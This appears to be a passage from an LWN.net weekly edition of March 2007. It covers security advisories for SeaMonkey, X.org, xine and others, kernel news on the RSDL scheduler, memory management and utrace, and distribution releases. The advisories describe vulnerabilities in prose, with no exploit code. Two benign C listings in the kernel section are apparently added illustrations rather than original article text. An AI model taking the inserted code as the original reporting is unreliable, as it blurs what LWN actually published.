arbitrary local files, or conduct an XSS attack against the user. (CVE-2007-0780, CVE-2007-0800) Two buffer overflow flaws were found in the Network Security Services (NSS) code for processing the SSLv2 protocol. Connecting to a malicious secure web server could cause the execution of arbitrary code as the user running SeaMonkey. (CVE-2007-0008, CVE-2007-0009) A flaw was found in the way SeaMonkey handled the "location.hostname" value during certain browser domain checks. This flaw could allow a malicious web site to set domain cookies for an arbitrary site, or possibly perform an XSS attack. (CVE-2007-0981) |
| Alerts: | |
Comments (1 posted)
shadow-utils: mailbox creation vulnerability
Package(s): shadow-utils
CVE #(s): CVE-2006-1174
Created: May 25, 2006
Updated: June 12, 2007
Description:
The useradd tool from the shadow-utils package has a potential security
problem. When a new user's mailbox is created, the permissions are
set to random garbage from the stack, potentially allowing the
file to be read or written during the time before fchmod() is called.
Comments (none posted)
slocate: information disclosure
Package(s): slocate
CVE #(s): CVE-2007-0227
Created: February 22, 2007
Updated: March 30, 2007
Description:
The slocate permission checking code has a local information disclosure
vulnerability. During the reporting of matching files, slocate does not
respect the parent directory's read permissions, resulting in hidden
filenames being viewable by other local users.
Comments (none posted)
smb4k: multiple vulnerabilities
Package(s): smb4k
CVE #(s): CVE-2007-0472
CVE-2007-0473
CVE-2007-0474
CVE-2007-0475
Created: February 13, 2007
Updated: March 12, 2007
Description:
The Smb4K 0.8.0 release announcement notes several security weaknesses in
the utility programs (stack overflows / the use of strcpy instead of
strncpy / a design error in smb4k_kill) and in the Smb4KFileIO class (use
of mktemp instead of mkstemp for creation of the temporary files, which
could lead to both a race and an information leak / a race in the code that
handles the lock file). Fixes for all of these issues are included in Smb4K
0.8.0 and in the patches that have been prepared for Smb4K 0.7.5 and
0.6.10a. Other versions are not supported anymore.
Comments (none posted)
snort: denial of service
Package(s): snort
CVE #(s): CVE-2006-6931
Created: February 14, 2007
Updated: March 1, 2007
Description:
From the Gentoo advisory: Randy Smith, Christian Estan and Somesh Jha
discovered that the rule matching algorithm of Snort can be exploited in a
way known as a "backtracking attack" to perform numerous time-consuming
operations. Version 2.6.1.2 contains the fix.
Comments (none posted)
spamassassin: denial of service
Package(s): spamassassin
CVE #(s): CVE-2007-0451
Created: February 16, 2007
Updated: March 14, 2007
Description:
Version 3.1.8 of Spamassassin fixes some bugs and a malformed HTML denial
of service vulnerability.
Comments (none posted)
sun-jdk: arbitrary code execution
Package(s): sun-jdk
CVE #(s): CVE-2007-0243
Created: February 19, 2007
Updated: April 25, 2007
Description:
An anonymous researcher discovered that an error in the handling of a GIF
image with a zero width field block leads to a memory corruption flaw. An
attacker could entice a user to run a specially crafted Java applet or
application that would load a crafted GIF image, which could result in
escalation of privileges and unauthorized access to system resources.
Comments (1 posted)
ufo2000: multiple vulnerabilities
Package(s): ufo2000
CVE #(s): CVE-2006-3788
CVE-2006-3789
CVE-2006-3790
CVE-2006-3791
CVE-2006-3792
Created: February 26, 2007
Updated: February 28, 2007
Description:
Five vulnerabilities were found: a buffer overflow in recv_add_unit();
a problem with improperly trusting user-supplied string information in
decode_stringmap(); several issues with array manipulation via various
commands during play; an SQL injection in server_protocol.cpp; and
finally, a second buffer overflow in recv_map_data().
Comments (none posted)
ulogd: buffer overflow
Package(s): ulogd
CVE #(s): CVE-2007-0460
Created: January 29, 2007
Updated: March 19, 2007
Description:
A buffer overflow in ulogd has an unknown impact and attack vectors related
to "improper string length calculations."
Comments (none posted)
unzip: long file name buffer overflow
Package(s): unzip
CVE #(s): CVE-2005-4667
Created: February 6, 2006
Updated: May 2, 2007
Description:
A buffer overflow in UnZip 5.50 and earlier allows local users to execute
arbitrary code via a long filename command line argument. NOTE: since the
overflow occurs in a non-setuid program, there are not many scenarios under
which it poses a vulnerability, unless unzip is passed long arguments when
it is invoked from other programs.
Comments (1 posted)
w3c-libwww: possible stack overflow
Package(s): w3c-libwww
CVE #(s): CVE-2005-3183
Created: October 14, 2005
Updated: May 2, 2007
Description:
Extensive testing of libwww's handling of multipart/byteranges content from
HTTP/1.1 servers revealed multiple logical flaws and bugs in
Library/src/HTBound.c
Comments (1 posted)
wireshark: multiple vulnerabilities
Comments (6 posted)
xine: format string vulnerabilities
Package(s): xine
CVE #(s): CVE-2007-0017
Created: January 23, 2007
Updated: August 10, 2007
Description:
Multiple format string vulnerabilities in (1) the cdio_log_handler function
in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and
the (2) cdio_log_handler and (3) vcd_log_handler functions in
modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in
VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to
execute arbitrary code via format string specifiers in an invalid URI, as
demonstrated by a udp://-- URI in an M3U file.
Comments (none posted)
xine-lib: buffer overflow
Package(s): xine-lib
CVE #(s): CVE-2006-6172
Created: December 5, 2006
Updated: June 5, 2007
Description:
A buffer overflow was discovered in the Real Media input plugin in
xine-lib. If a user were tricked into loading a specially crafted stream
from a malicious server, the attacker could execute arbitrary code with the
user's privileges.
Comments (none posted)
xine-lib: buffer overflow
Package(s): xine-lib
CVE #(s): CVE-2006-1664
Created: April 27, 2006
Updated: February 27, 2008
Description:
xine-lib does an improper input data boundary check on
MPEG streams. A specially crafted MPEG file can be
created that can cause arbitrary code execution when the
file is accessed.
Comments (none posted)
xinit: race condition
Package(s): xinit
CVE #(s): CVE-2006-5214
Created: October 17, 2006
Updated: August 9, 2007
Description:
A race condition allows local users to see error messages generated during
another user's X session. This could allow potentially sensitive
information to be leaked.
Comments (1 posted)
X.org: local privilege escalations
Package(s): xorg-x11
CVE #(s): CVE-2006-4447
Created: August 28, 2006
Updated: April 30, 2007
Description:
Several X.org libraries and X.org itself contain system calls to
set*uid() functions, without checking their result. Local users could
deliberately exceed their assigned resource limits and elevate their
privileges after an unsuccessful set*uid() system call. This requires
resource limits to be enabled on the machine.
Comments (none posted)
X.org: integer overflows
Package(s): xorg, xorg-server
CVE #(s): CVE-2006-6101
CVE-2006-6102
CVE-2006-6103
Created: January 10, 2007
Updated: March 8, 2007
Description:
A number of integer overflows have turned up in the X.org server. Some of
these overflows involve calls to alloca(), and thus make corruption of the
stack relatively easy. This vulnerability is exploitable by anybody who can
make a connection to the server, meaning that it is a local root exploit in
most settings. See this advisory for details.
Comments (none posted)
xpdf: buffer overflow
Package(s): xpdf
CVE #(s): CAN-2005-0064
Created: January 19, 2005
Updated: March 15, 2007
Description:
iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details.
Comments (1 posted)
Page editor: Jonathan Corbet
Kernel development
Brief items
The current 2.6 prepatch is 2.6.21-rc3,
released by Linus on
March 6. It contains quite a few fixes and some KVM enhancements.
Says Linus: "...there's some hope that it will work more widely than
-rc1 and -rc2 did." The long-form changelog has the details.
As of this writing, no patches have been merged into the mainline git
repository since -rc3 was released.
The current -mm tree is 2.6.21-rc2-mm2. Recent changes
to -mm include a set of memory anti-fragmentation patches (see below), the
dropping of the buffered filesystem I/O patches, the Devicescape wireless stack (now rebranded "mac80211"),
and a new krealloc()
memory allocation function.
For older kernels: 2.6.19.6 and 2.6.19.7 were released on
March 2. They contain a fair number of fixes, at least one of which
is security-related. "Barring anything major, there will not be any
more 2.6.19 releases. If you disagree with this, please let the stable
team know about the patches that you feel must be in a new release. We
need to move on to flushing out the very large backlog of 2.6.20-stable
patches."
2.6.16.43-rc1 was released on
March 1. It contains a fair number of fixes and a few new hwmon
drivers.
Comments (none posted)
Kernel development news
Ooh you have a vm patch that helps swap on the desktop! I can help you here
with my experience from swap prefetch.
1. Get it reviewed and have no one show any evidence it harms
2. Find hundreds of users who can testify it helps
3. Find a way of quantifying it.
4. ...
5. Merge into mainline.
There, that should get you as far as 4.
I haven't figured out what 4 is yet. I believe it may be goto 1;
--
Con Kolivas (thanks to Jos Poortvliet).
-mm is crap at present. Well. Mainline is crap at present, and
-mm is crap^2. I think I might be about to throw vast amounts of
code overboard.
--
Andrew Morton
I'm really fed up with having to pull big changes after the merge
window, because it just doesn't seem to let up. I'm going to go
postal on the next maintainer who doesn't understand what "merge
window" and "fixes only" means.
--
Linus Torvalds
Comments (3 posted)
CPU scheduling seems to be one of those eternally unfinished jobs.
Developers can work on the CPU scheduler for a while and make it work
better, but there will always be workloads which are not served as well as
users would like. Users of interactive systems, in particular, tend to be
sensitive to scheduler latencies. In response, the current scheduler has
grown an elaborate array of heuristics which attempt to detect which
processes are truly interactive and give them priority in the CPU. The
result is complicated code - and people still complain about interactive
response.
Enter Con Kolivas, who has been working on improving interactivity for some
time. His latest proposal is the Rotating Staircase Deadline
Scheduler (RSDL), which attempts to provide good interactive response with a
relatively simple design, complete fairness, and bounded latency. This
work takes ideas from
Con's earlier staircase scheduler (covered here in June, 2004), but
with a significantly different approach.
Like many schedulers, the RSDL maintains a priority array, as is crudely
diagrammed to the left. At each level there is a list of processes
currently wanting to run at that priority; each process has a quota of time
it is allowed to execute at that priority. The processes at the highest
priority are given time slices, and the scheduler rotates through them
using a typical round-robin algorithm.
When a process uses its quota at a given priority level, it is dropped down
to the next priority and given a new quota. That process can thus continue
to run, but only after the higher-priority processes have had their turn.
As processes move down the staircase, they increasingly must contend with
the lower-priority processes which have been patiently waiting on the lower
levels. The
end result is that even the lowest-priority processes get at least a little
CPU time eventually.
An interesting feature of this scheduler is that each priority level has a
quota of its own. Once the highest priority level has used its quota, all
processes running at that level are pushed down to the next-lower level,
regardless of whether they have consumed their individual CPU time quotas
or not. As a result of this "minor rotation" mechanism, processes waiting
at lower priority levels need only
cool their heels for a bounded period of time before all other processes
are running at their level. The maximum latency for any process waiting to
run is thus bounded, and can be calculated; there is no starvation with
this scheduler.
As processes use up their time, they are moved to a second array, called the
"expired" array; there they are placed back at their original priority.
Processes in the expired array do not run; they are left out in the cold
until no more processes remain in the currently active array - or until all
processes are pushed off the bottom of the active array as a result of
minor rotations. At that point, a "major rotation" happens: the active and
expired arrays are switched and the whole series of events restarts from
the beginning.
The current scheduler tries to locate interactive tasks by tracking how
often each process sleeps; those seen to be interactive are then rewarded
with a priority boost. The RSDL does away with all that. Instead,
processes which sleep simply do not use all of their time at the higher
priority levels. When they run, they are naturally advantaged over their
CPU-hungry competition. If a process sleeps through a major rotation, its
quota goes back into the run queue's priority-specific quota value. Thus,
it will be able to run at high priority even if other high-priority
processes, which have been running during this time, have been pushed to
lower priorities through minor rotations. All of this should add up to
quick response from interactive applications.
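As an added illustration, not Con's patch, here is a small C model of the staircase just described: the level and task quotas are made-up constants, time is counted in whole ticks, and the modelled processes never sleep. rsdl_run() drives it; with two CPU hogs at the top priority and one batch job at the bottom, the batch job first runs at tick 13, one past the 12 ticks the three levels above it can hold the CPU, and everyone keeps getting CPU time across major rotations.

```c
#include <string.h>

#define NLEVELS     4   /* priority levels per array; 0 is the highest */
#define MAX_TASKS   8
#define LEVEL_QUOTA 4   /* ticks a level may use before a minor rotation (made up) */
#define TASK_QUOTA  3   /* ticks a task may use at one level before dropping (made up) */

struct task {
    int prio;       /* static priority: level it returns to after a major rotation */
    int level;      /* current level in the active array, -1 while expired */
    int quota;      /* ticks left at the current level */
    int cpu_ticks;  /* total CPU time received */
    int first_run;  /* tick at which the task first ran, -1 if never */
};

struct rsdl {
    struct task tasks[MAX_TASKS];
    int ntasks;
    int level_quota[NLEVELS];   /* remaining quota of each active-array level */
    int last_run;               /* index of the task run last, for round-robin */
    int tick, major_rotations;
};

/* Levels above priority p, each with its own quota, can delay a task by at most
 * this many ticks per major cycle: the bounded latency the text describes. */
int rsdl_latency_bound(int prio) { return prio * LEVEL_QUOTA; }

/* Major rotation (array swap): all tasks back at their own priority, fresh quotas. */
static void major_rotation(struct rsdl *rq)
{
    for (int i = 0; i < rq->ntasks; i++)
        rq->tasks[i].level = rq->tasks[i].prio, rq->tasks[i].quota = TASK_QUOTA;
    for (int l = 0; l < NLEVELS; l++)
        rq->level_quota[l] = LEVEL_QUOTA;
    rq->major_rotations++;
}

void rsdl_init(struct rsdl *rq, const int *prios, int n)
{
    memset(rq, 0, sizeof *rq);
    rq->ntasks = n > MAX_TASKS ? MAX_TASKS : n;
    rq->last_run = -1;
    for (int i = 0; i < rq->ntasks; i++)
        rq->tasks[i].prio = prios[i], rq->tasks[i].first_run = -1;
    major_rotation(rq);
    rq->major_rotations = 0;
}

/* One step down the staircase; off the bottom step means the expired array. */
static void demote(struct task *t)
{
    if (t->level == NLEVELS - 1) { t->level = -1; return; }
    t->level++;
    t->quota = TASK_QUOTA;
}

/* Minor rotation: the level's quota is spent, so everyone on it moves down,
 * whether or not they have used their individual quotas. */
static void minor_rotation(struct rsdl *rq, int level)
{
    for (int i = 0; i < rq->ntasks; i++)
        if (rq->tasks[i].level == level)
            demote(&rq->tasks[i]);
}

/* Highest non-empty active level, then round-robin among the tasks on it. */
static int pick_next(const struct rsdl *rq)
{
    int best = NLEVELS, i;
    for (i = 0; i < rq->ntasks; i++)
        if (rq->tasks[i].level >= 0 && rq->tasks[i].level < best)
            best = rq->tasks[i].level;
    for (int k = 1; best < NLEVELS && k <= rq->ntasks; k++)
        if (rq->tasks[i = (rq->last_run + k) % rq->ntasks].level == best)
            return i;
    return -1;
}

/* Give one tick of CPU to the task the staircase picks. */
void rsdl_tick(struct rsdl *rq)
{
    int i = pick_next(rq);
    if (i < 0) {                          /* active array drained: swap arrays */
        major_rotation(rq);
        if ((i = pick_next(rq)) < 0)
            return;                       /* nothing runnable at all */
    }
    struct task *t = &rq->tasks[i];
    rq->tick++, rq->last_run = i, t->cpu_ticks++, t->quota--;
    if (t->first_run < 0)
        t->first_run = rq->tick;
    if (--rq->level_quota[t->level] == 0)
        minor_rotation(rq, t->level);     /* takes t down with the others */
    else if (t->quota == 0)
        demote(t);
}

/* Run the model for a number of ticks; the counters in rq are the result. */
void rsdl_run(struct rsdl *rq, int ticks) { while (ticks-- > 0) rsdl_tick(rq); }
```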
A few benchmarks posted by Con show
that systems running with RSDL perform slightly better than with the stock
2.6.20 scheduler. The initial reports from testers have been positive,
with one person urging that RSDL go into
2.6.21. That will not happen at this point in the release cycle, but
Linus is favorable to including RSDL in a
future kernel:
I agree, partly because it's obviously been getting rave reviews so
far, but mainly because it looks like you can think about behaviour
a lot better, something that was always very hard with the
interactivity boosters with process state history.
Con has recently been heard to complain about difficulties getting his
interactivity improvements into the mainline. This time around, however,
he may find the course of events to be rather more gratifying.
Comments (10 posted)
Memory management has been a relatively quiet topic over much of the life
of the 2.6.x kernels. Many of the worst problems have been solved and the
MM hackers have gone on to other things. That does not mean that there is
no more work to do, however; indeed, things might be about to heat up. A
few recent discussions illustrate the sort of pressures which may lead to a
renewed interest in memory management work in the near future.
Mel Gorman's fragmentation avoidance patches have been discussed here a few
times in the past. The core idea behind Mel's work is to identify pages
which can be easily moved or reclaimed and group them together. Movable
pages include those allocated to user space; moving them is just a matter
of changing the relevant page table entries. Reclaimable pages include
kernel caches which can be released should the need arise. Grouping
these pages together makes it easy for the kernel to free large blocks of
memory, which is useful for enabling high-order allocations or for vacating
regions of memory entirely.
In the past, reviewers of Mel's patches have disagreed over how they should
work. Some argue in favor of maintaining separate free lists for the
different types of allocations, while others feel that this sort of memory
partitioning is just what the kernel's zone system was created to do. So,
this time around, Mel has posted two sets of patches: a list-based grouping mechanism
and a new ZONE_MOVABLE
zone which is restricted to movable allocations.
The difference this time around is that the two patches are designed to
work together. By default, there is no movable zone, so the list-based
mechanism handles the full job of keeping alike allocations together. The
administrator can configure in ZONE_MOVABLE at boot time with the
kernelcore= option, which specifies the amount of memory which is
not to be put into that zone. In addition, Mel has posted some comprehensive information on how
performance is affected by these patches. In an unusual move, Mel has
included a set of videos showing just how memory allocations respond to
system stress with different allocation mechanisms in place; the image at
the right shows one frame from one of those videos. The demonstration is
convincing, but one is left with the uneasy hope that the creation of
multimedia demonstrations will not become necessary to get patches into the
kernel in the future.
These patches have found their way into the -mm tree, though Andrew Morton
is still unclear on whether he thinks they are worthwhile or not. Among
other things, he is concerned about how they fit with other, related work,
especially memory hot-unplugging and per-container memory limits. While
patches addressing both areas have been posted, nothing is really at a
point where it is ready to be merged. This
discussion between Mel and Andrew is worth reading for those who are
interested in this topic.
The hot removal of memory can clearly be helped by Mel's work - memory
which is subject to removal can be restricted to movable and reclaimable
allocations, allowing it to be vacated if need be. Not everybody is
convinced that hot-unplugging is a useful feature, though. In particular,
Linus is opposed to the idea. The biggest
potential use for hot-unplugging is for virtualization; it allows a
hypervisor to move memory resources between guests as their needs change.
Linus points out that most virtualization mechanisms already have
mechanisms which allow the addition and removal of individual pages from
guests; there is, he says, no need for any other support for memory
changes.
Another use for this technique is allowing systems to conserve power by
turning off banks of memory when they are not needed. Clearly, one must be
able to move all useful data out of a memory bank before powering it down.
Linus is even more dismissive of this idea:
The whole DRAM power story is a bedtime story for gullible
children. Don't fall for it. It's not realistic. The hardware
support for it DOES NOT EXIST today, and probably won't for several
years. And the real fix is elsewhere anyway...
More information on his objections is available here for those who are interested. In short,
Linus thinks it would make much more sense to look at turning off entire
NUMA nodes rather than individual memory banks. That notwithstanding, Mark
Gross has posted a patch enabling
memory power-down which includes some basic anti-fragmentation
techniques. Says Mark:
To be clear PM-memory will not be useful unless you have workloads
that can take advantage of it. The identified workloads are not
desktop workloads. However; there is a non-zero number of
interested users with applicable workloads that make pushing the
enabling patches out to the community worth while. These workloads
tend to be within network elements and servers where memory
utilization tracks traffic load.
It has also been suggested that resident set size limits (generally
associated with containers) can solve many of the same problems that the
anti-fragmentation work is aimed at. Rik van Riel was heard to complain in response that RSS limits
could aggravate the scalability problems currently being experienced by
the Linux memory management system. That drew questions from people like
Andrew, who were not really aware of those problems. Rik responded with a few relatively vague
examples; his ability to be specific is evidently restricted by agreements
with the customers experiencing the problems.
That led to a whole discussion on whether it makes any sense to try to
address memory management problems without test cases which demonstrate
those problems. Rik argues that fixing
test cases tends to break things in the real world. Andrew responds:
Somehow I don't believe that a person or organisation which is
incapable of preparing even a simple testcase will be capable of
fixing problems such as this without breaking things.
Rik has put together a page
describing some problem workloads in an attempt to push the discussion
forward.
One of Andrew's points is that trying to fix memory management problems
caused by specific workloads in the kernel will always be hard; the kernel
simply does not always have the information to know which pages will be
needed soon and which can be discarded. Perhaps, he says, the right answer
is to make it easier for user space to communicate its expected future
needs. To that end, he put together a pagecache management tool for
testing. It works as an LD_PRELOAD library which intercepts
file-related system calls, tracks application usage, and tells the kernel
to drop pages out of the cache after they have been used. The result is
that common operations (copying a kernel tree, for example) can be carried
out without forcing other useful data out of the page cache.
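The page-dropping step of that tool, as an added Linux-only example that is not Andrew's LD_PRELOAD library: a file copy that reads and writes normally, flushes the output, and then uses posix_fadvise(POSIX_FADV_DONTNEED) to evict both files from the page cache. The sample file under /tmp and its byte pattern are constructed for the self-check in demo_copy().

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define SAMPLE_BYTES (64L * 4096)   /* size of the constructed sample file */

/* Ask the kernel to drop this file's pages from the page cache.  DONTNEED
 * quietly skips dirty pages, so a file we wrote is flushed to disk first. */
static int drop_from_page_cache(int fd, int written)
{
    if (written && fdatasync(fd) != 0)
        return -1;
    return posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED) == 0 ? 0 : -1;
}

/* Copy src to dst with plain read()/write(), then evict both files from the
 * page cache so the copy does not push other, still useful, data out of it.
 * Returns the number of bytes copied, or -1 on error. */
long copy_file_uncached(const char *src, const char *dst)
{
    char buf[65536];
    long total = 0;
    int in = open(src, O_RDONLY);
    if (in < 0)
        return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (out < 0) {
        close(in);
        return -1;
    }
    while (total >= 0) {
        ssize_t n = read(in, buf, sizeof buf);
        if (n <= 0) {
            if (n < 0) total = -1;
            break;
        }
        for (char *p = buf; n > 0; ) {          /* cope with short writes */
            ssize_t w = write(out, p, (size_t)n);
            if (w < 0) { total = -1; break; }
            p += w, n -= w, total += w;
        }
    }
    if (total >= 0 && (drop_from_page_cache(in, 0) || drop_from_page_cache(out, 1)))
        total = -1;
    close(in);
    close(out);
    return total;
}

/* Byte expected at a given offset of the constructed sample file. */
static unsigned char sample_byte(long off) { return (unsigned char)(off * 7 + (off >> 12)); }

/* Self-check: build the sample file, copy it uncached and verify the copy byte
 * for byte.  Returns SAMPLE_BYTES on success, -1 on any failure. */
long demo_copy(void)
{
    char src[] = "/tmp/pc_src_XXXXXX", dst[] = "/tmp/pc_dst_XXXXXX";
    unsigned char chunk[4096];
    long result = -1, off = 0;
    int sfd = mkstemp(src), dfd = -1;
    if (sfd < 0)
        return -1;
    dfd = mkstemp(dst);
    if (dfd < 0)
        goto out;
    for (; off < SAMPLE_BYTES; off += (long)sizeof chunk) {
        for (long j = 0; j < (long)sizeof chunk; j++)
            chunk[j] = sample_byte(off + j);
        if (write(sfd, chunk, sizeof chunk) != (ssize_t)sizeof chunk)
            goto out;
    }
    if (copy_file_uncached(src, dst) != SAMPLE_BYTES)
        goto out;
    /* dfd still refers to dst and sits at offset 0: read the copy back */
    for (off = 0;;) {
        ssize_t n = read(dfd, chunk, sizeof chunk);
        if (n < 0)
            goto out;
        if (n == 0)
            break;
        for (ssize_t j = 0; j < n; j++)
            if (chunk[j] != sample_byte(off + j))
                goto out;
        off += n;
    }
    if (off == SAMPLE_BYTES)
        result = off;
out:
    close(sfd);
    if (dfd >= 0) {
        close(dfd);
        unlink(dst);
    }
    unlink(src);
    return result;
}
```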
There were some skeptical responses to this posting. There was also
some interest and some discussion of how smarter, application-specific
policies could be incorporated into the tool. A possible backup tool policy, for example,
would force the output file out of memory immediately, track pages read
from other files and force them back out - but only if they were not
already in the page cache, and so on. It remains to be seen whether
anybody will run with this tool and try to use it to solve real workload
problems, but there is some potential there. The kernel does not always
know best.
Comments (26 posted)
The interface for tracing programs under Linux is the
ptrace()
system call. It is used primarily by debuggers, but there are other
applications too; User-mode Linux can use
ptrace(), for example.
The interface gets the job done, but there are few system calls which
endure more criticism. The list of ptrace() shortcomings is long:
its interface is difficult for user-space developers to use and for
kernel-space developers to maintain, it is inefficient, and it has been the
source of more than one security problem over the years. Still,
ptrace() endures; it is part of the user-space API and there is
nothing better available.
Soon there may be a better alternative, in the form of the "utrace" patch
(by Roland McGrath) which is currently in the -mm tree. Utrace replaces
ptrace() entirely, while maintaining the same interface to user
space. As such, it is a useful cleanup of a difficult system call. The
real value of utrace, however, is likely to be seen in new tracing
interfaces in the future.
The core utrace code does not interface with user space at all; instead, it
is an in-kernel API which can be used to build kernel-based tracing
mechanisms. These mechanisms are based around the concept of a "tracing
engine," which is defined by the usual structure full of method pointers.
This structure (struct utrace_engine_ops) has fourteen callbacks,
each covering something which the traced process might do or have done to
it. For example, one callback is:
u32 (*report_syscall_entry)(struct utrace_attached_engine *engine,
struct task_struct *tsk,
struct pt_regs *regs);
Whenever the traced process invokes a system call, the tracing engine will
(if it has asked for this event) receive a call to its
report_syscall_entry() callback. The call happens at a "safe"
time before the system call is executed; no locks are held, and the tracing
process can safely access the traced process's state. The callback returns
a bitmask specifying what happens next; the bitmask can change the tracing
state, detach the engine, hide the event from other tracing engines, and
more.
A tracing engine is put into service with:
struct utrace_attached_engine *
utrace_attach(struct task_struct *target, int flags,
const struct utrace_engine_ops *ops,
unsigned long data);
This call will attach the engine to the given target process.
There can be more than one engine attached to any given process - a
significant difference from ptrace(). A newly-attached engine
does not actually do anything; one can think of it as being in an idling
state. Putting the engine into gear requires setting one or more action
flags with:
int utrace_set_flags(struct task_struct *target,
struct utrace_attached_engine *engine,
unsigned long flags);
There is a special flag (UTRACE_EVENT(QUIESCE)) which puts the
target process into a quiescent state. In general, operating on the task
first requires setting this flag, then waiting for a callback (to the
report_quiesce() engine method) that says the process is truly
stopped. There is a whole other set of events which can be requested:
forking, execing a new program, receiving a signal, process death, system
call entry and exit, etc. Single-stepping through instructions and program
blocks is also handled through the event mechanism.
A signal can be forced into the target process with:
int utrace_inject_signal(struct task_struct *target,
struct utrace_attached_engine *engine,
u32 action, siginfo_t *info,
const struct k_sigaction *ka);
Signals injected in this manner are delivered to the target process
immediately; they are not queued in the usual manner.
There is more to the utrace API than is described in this brief overview,
including an API for describing and working with CPU registers;
see the excellent documentation file
packaged with the patch for more details. Also included with the patch is
a complete reimplementation of ptrace() built on top of utrace.
Reimplementing ptrace() is only so interesting, however, even if
the result is a big improvement. The real purpose behind utrace looks to
be to inspire the creation of the next generation of user-space process
tracing APIs, and more. Roland told your editor:
The intent of the utrace API is not just to facilitate my writing
the one great new userland API to replace ptrace. Its core purpose
is to put writing a new user debugging facility more on par with
writing a software device driver, a filesystem, or a network stack,
so that many people can come up with ideas and experiment without
doing brain surgery every time. It ties up the really nasty
low-level implementation issues, and lets different unrelated
facilities coexist without interfering with each other.
In other words, while utrace should enable the eventual retirement of
ptrace(), there is more coming than that. If and when utrace
makes it into the mainline, look for it to inspire interesting developments
in a number of areas.
Comments (11 posted)
Patches and updates
Kernel trees
Core kernel code
Development tools
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Architecture-specific
Virtualization and containers
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Red Hat Enterprise Linux (RHEL) 5 is due to be released on March 14. In
addition to the rock-solid Server and Client software, RHEL 5 includes some
unsupported technology previews, including Stateless Linux, GFS2, FS-Cache,
Compiz, AIGLX and much more.
RHEL 5 features a 2.6.18 kernel with virtualization support and many
improvements over the 2.6.9 kernel used by RHEL 4. A few features have
been backported from 2.6.19 as well for improved performance and
scalability.
Red Hat Enterprise Linux 5 Release Notes are available by platform:
ia64,
ppc,
S390,
x86
and x86_64.
Though not finalized yet, they provide a good look at what you'll find in
RHEL 5.
Comments (1 posted)
New Releases
64 Studio is a GNU/Linux distribution made for digital content creation,
including audio, video, graphics and publishing tools. A remix of Debian
testing, it comes in both AMD64/Intel64 and 32-bit flavors. Version 1.2.0
is a development release, based on a snapshot of Debian from February 14th.
"The 2.6.19-rt kernel package included in this release may cause a
kernel oops with certain USB audio hardware. Users of 64 Studio on
production systems may therefore prefer to stick with the stable 1.0
release for the time being."
Full Story (comments: none)
BackTrack 2.0 has been released. BackTrack is a Slackware-based live CD distribution aimed
at penetration testing. "Currently BackTrack consists of more than
300 different up-to-date tools which are logically structured according to
the work flow of security professionals. This structure allows even
newcomers to find the related tools to a certain task to be
accomplished." The
BackTrack page has more
information.
Full Story (comments: 7)
Fedora 7 Test 2 has been released. Click below for download information,
some known problems and a look at what's new since Test 1.
Full Story (comments: 1)
The Foresight Linux community has announced the release of version 1.0.1 of
Foresight Linux. "Foresight Linux is a desktop linux system that
just works. Our mission is to provide a truly useful desktop system that
is friendly for the novice user, as well as flexible for the power
user. Great attention has been paid to making things simple and
integrated, and we seek an excellent end-user experience by removing the
barriers commonly associated with usage of the Linux Desktop."
Full Story (comments: none)
Musix GNU+Linux 0.99, a Debian-based distribution aimed at multimedia
creation, has been released. "The most remarkable programs in Musix 0.99 are: Ardour 0.99.3 (audio
sequencer), Rosegarden 1.4.0 (audio/midi sequencer), Cinelerra (video
edition), Bluefish (web design), GIMP (image manipulation), Inkscape
(vectorial graphic design) and Blender3D (3D animation)."
Full Story (comments: 3)
The Comodo Trustix team has announced the release of Trustix Secure Linux
3.0.5, an update to the previous "Tikka Masala". The new release is named
"Mirch Masala" to describe the interesting new changes that come with it.
"The highlighted change for this release is the return of anaconda as
the preferred choice of installer for Trustix. In addition some of the core
packages have been updated to their latest revisions to provide the same
level of security and stability."
Full Story (comments: none)
Herd 5, the fifth Feisty Fawn development release, is out in Ubuntu,
Kubuntu, Edubuntu and Xubuntu flavors. "The primary focus during the time
from Herd 4 has been bug fixing. Please refer to
http://www.ubuntu.com/testing/herd5 for information on changes in Ubuntu,
and https://wiki.kubuntu.org/FeistyFawn/Herd5/Kubuntu for changes in
Kubuntu."
Full Story (comments: none)
Distribution News
The platforms for the candidates are now
available, as are
any rebuttals. The
Debian Project Leader
Elections 2007 page has links to each candidate's platform, and any
rebuttals from that candidate have been appended to the platform. The
DPL Debate will be on IRC in
#debian-dpl-debate on irc.debian.org (OFTC) at 21:30 UTC, March 10th 2007,
ending at 00:30 UTC, March 11th 2007. Discussion of the debate will occur
in #debian-dpl-discuss on the same network.
Comments (none posted)
It seems you can't go home again. Shortly after rejoining the project,
Gentoo founder Daniel Robbins has left again. Click below for links to
relevant messages on gentoo-devel mailing list and Alexandre Rostovtsev's
humorous summary of the events.
Full Story (comments: 7)
GNU-Darwin is a free software distribution for PowerPC, Intel and AMD, based on FreeBSD and of course GNU software. "I have recently gotten a handle on the life expectancy of our Distribution in years. Given the current rate of decay and deterioration of our equipment, including file system damage and obsolescence, we can expect that GNU-Darwin will be dead as the proverbial door-nail within 9 years. In order to avert the demise of the Distro, it would take a major rejuvenation of talent, resources, and interest, which is not forthcoming it appears."
The OpenSolaris starter kit includes tutorials, documentation, and two DVDs filled with useful software like Solaris Express and live CD images for Nexenta OS, BeleniX and SchilliX, Sun Studio compilers and OpenSolaris source code.
Here's a word from the GNOME team at Novell. "The team at Novell responsible for GNOME have been quiet in openSUSE for some time, even though we already have several great external contributors like James Ogley and Andreas Hanke and we've pushed in significant general technologies like Compiz/Xgl, NetworkManager and Beagle. All this is changing though, we've had an IRC channel for a while but we haven't really advertised it (#opensuse-gnome on irc.freednode.net) and we have an opensuse-gnome mailing list as well now."
The Ubuntu Masters Of The Universe (MOTU) have a new mailing list and a new
application form for those who are already involved to take the next step
and become a MOTU.
Distribution Newsletters
